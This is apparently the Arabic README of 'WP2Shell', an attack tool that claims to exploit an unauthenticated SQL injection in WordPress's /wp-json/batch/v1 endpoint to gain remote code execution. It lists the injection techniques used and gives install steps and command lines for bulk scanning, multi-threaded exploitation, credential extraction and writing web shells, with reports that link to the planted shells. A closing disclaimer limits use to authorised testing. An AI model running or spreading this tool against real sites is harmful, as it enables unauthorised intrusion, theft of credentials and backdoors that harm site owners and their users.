
WP2Shell - CVE-2026-63030 / CVE-2026-60137 تستغل هذه الأداة ثغرة حرجة من حقن SQL في نقطة نهاية REST API الخاصة بـ WordPress `/wp-json/batch/v1`، مما يسمح للمهاجمين غير المصادَق عليهم بتنفيذ استعلامات SQL تعسفية وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على تثبيتات WordPress المعرضة للخطر.
أداة شاملة لاكتشاف واستغلال ثغرة نقطة نهاية Batch في واجهة REST API الخاصة بـ WordPress.
تستغل هذه الأداة ثغرة حرجة في حقن SQL ضمن نقطة نهاية /wp-json/batch/v1 في واجهة REST API الخاصة بـ WordPress، مما يسمح للمهاجمين دون مصادقة بتنفيذ استعلامات SQL عشوائية وتحقيق تنفيذ الأوامر عن بُعد (RCE) على تثبيتات WordPress الضعيفة.
الثغرة: CVE-2026-63030 / CVE-2026-60137
ناقل الهجوم: حقن SQL في نقطة نهاية Batch بواجهة REST API الخاصة بـ WordPress (/wp-json/batch/v1)
الأثر: تنفيذ الأوامر عن بُعد (RCE) دون مصادقة
الإصدارات المتأثرة: WordPress 6.4.x والإصدارات الأقدم (سيتم تحديد الإصدارات الدقيقة لاحقًا)
SLEEP()ORDER BYINTO OUTFILE (عندما يُسمح بذلك)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- تقرير JSON: بيانات منظمة تتضمن حالة الثغرة وبيانات الاعتماد المستخرجة
2- تقرير HTML: تصور جميل ومرمّز بالألوان مع روابط قشرة ويب قابلة للنقر
هذه الأداة مخصصة لأغراض التعليم والاختبار المصرح به فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.